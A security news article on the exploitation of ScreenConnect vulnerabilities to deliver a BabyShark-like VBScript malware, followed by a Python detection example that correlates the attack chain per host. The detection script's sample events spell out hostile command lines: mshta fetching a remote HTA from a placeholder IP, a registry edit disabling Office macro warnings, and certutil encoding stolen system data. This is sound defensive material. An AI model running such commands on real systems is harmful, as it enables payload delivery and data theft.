Critical ScreenConnect flaws exploited to deploy Babyshark malware variant

A threat actor has been observed exploiting a recently disclosed critical vulnerability in the ConnectWise ScreenConnect remote access tool to deploy a malware strain similar to the Babyshark malware family associated with a North Korean state-backed cyberespionage group known as Kimsuky, Thallium and Velvet Chollima.

BabyShark is a Microsoft Visual Basic (VB) script-based malware family first seen in November 2018. It is launched by executing a first-stage HTA fetched from a remote location, so it can be delivered via different file types, including PE files as well as malicious documents. It exfiltrates system information to the command-and-control (C2) server, maintains persistence on the system, and waits for further instructions from the operator.

The new campaign, detected by Kroll's threat response team, involved the exploitation of CVE-2024-1708 and CVE-2024-1709, two ScreenConnect vulnerabilities patched last month. CVE-2024-1709 is an authentication bypass issue, which can allow a remote non-authenticated attacker to bypass the authentication process and gain full access to the system, while CVE-2024-1708 is a path traversal issue that can be used to conduct directory traversal attacks. When exploited in tandem, the vulnerabilities could be used to perform remote code execution post-authentication.

According to Kroll, the threat actor gained access to the victim's workstation by exploiting the exposed setup wizard of the ScreenConnect application. The attackers then used the command prompt (cmd.exe) to run the MSHTA utility, through which a heavily obfuscated VB script was downloaded. This script downloaded and executed the next-stage payload, which implements a set of functionalities including setting Windows registry keys, capturing and exfiltrating system information (host, user, network and security software information along with installed software and running processes), and setting up a scheduled task.

The malware then runs several commands to modify the Windows registry so that both trusted and untrusted macros run without notification, turning off some macro protections in those versions.

“The reason for the script to set these registry keys is not immediately apparent since execution has already been achieved. One potential reason might be to make victims more susceptible to later phishing attacks, should the initial infection fail to establish persistent access or be remediated,” the researchers wrote.

After capturing the required information, the malware uses the built-in Windows command certutil to encode the stolen information as a Privacy Enhanced Mail (PEM) certificate, which it then exfiltrates to the C2 web application. This technique was seen in previous attacks by Kimsuky, the researchers noted. The infostealer code finishes up by deleting both the capture and certificate files.

Finally, the malware creates a scheduled task that researchers theorize could act “as a rudimentary loader for a further stage of malware.”
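The chain described above (ScreenConnect spawning cmd.exe, mshta.exe fetching a remote HTA, registry edits that silence macro warnings, and certutil encoding stolen data as a PEM file) can be correlated per host over process-creation telemetry; the following is an added detection example, not code from Kroll or the article. The ScreenConnect client process name, the VBAWarnings registry value and the sample events are assumptions constructed for the example.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

@dataclass
class ProcEvent:
    host: str
    parent: str   # parent process image name
    image: str    # process image name
    cmdline: str  # full command line

# Constructed Sysmon-style events (not real telemetry); the ScreenConnect client process name is an assumption.
SAMPLE_EVENTS = [
    ProcEvent("ws01", "ScreenConnect.ClientService.exe", "cmd.exe",
              "cmd.exe /c mshta http://203.0.113.5/stage1.hta"),
    ProcEvent("ws01", "cmd.exe", "mshta.exe", "mshta http://203.0.113.5/stage1.hta"),
    ProcEvent("ws01", "wscript.exe", "reg.exe",
              r"reg add HKCU\Software\Microsoft\Office\16.0\Word\Security"
              r" /v VBAWarnings /t REG_DWORD /d 1 /f"),
    ProcEvent("ws01", "wscript.exe", "certutil.exe",
              r"certutil -encode C:\Users\Public\sysinfo.txt C:\Users\Public\sysinfo.pem"),
    ProcEvent("ws02", "explorer.exe", "mshta.exe", r"mshta C:\Tools\vendor\setup.hta"),
    ProcEvent("ws02", "cmd.exe", "certutil.exe", "certutil -hashfile installer.msi SHA256"),
]

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

def matched_rules(ev: ProcEvent) -> set[str]:
    """Names of every behavioural rule that this single event triggers."""
    image, parent, cmd = ev.image.lower(), ev.parent.lower(), ev.cmdline.lower()
    rules = set()
    if image == "cmd.exe" and parent.startswith("screenconnect"):
        rules.add("shell_from_remote_access_tool")
    if image == "mshta.exe" and REMOTE_URL.search(cmd):
        rules.add("mshta_remote_hta")            # first-stage HTA fetched from a URL
    if image == "certutil.exe" and "-encode" in cmd.split():
        rules.add("certutil_encode_to_pem")      # stolen data staged as a fake certificate
    if image == "reg.exe" and "vbawarnings" in cmd and "/d 1" in cmd:
        rules.add("office_macro_warnings_disabled")
    return rules

def rules_per_host(events: list[ProcEvent]) -> dict[str, set[str]]:
    # Correlate hits by host so the chain, not any one command, raises the alert.
    hits: dict[str, set[str]] = defaultdict(set)
    for ev in events:
        hits[ev.host] |= matched_rules(ev)
    return dict(hits)

def suspicious_hosts(events: list[ProcEvent], min_rules: int = 2) -> list[str]:
    """Hosts on which at least `min_rules` distinct stages of the chain were seen."""
    return sorted(h for h, r in rules_per_host(events).items() if len(r) >= min_rules)
```

Requiring two or more distinct stages on the same host keeps a lone local HTA launch or a certutil hash check from paging anyone, while the full chain on ws01 does.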
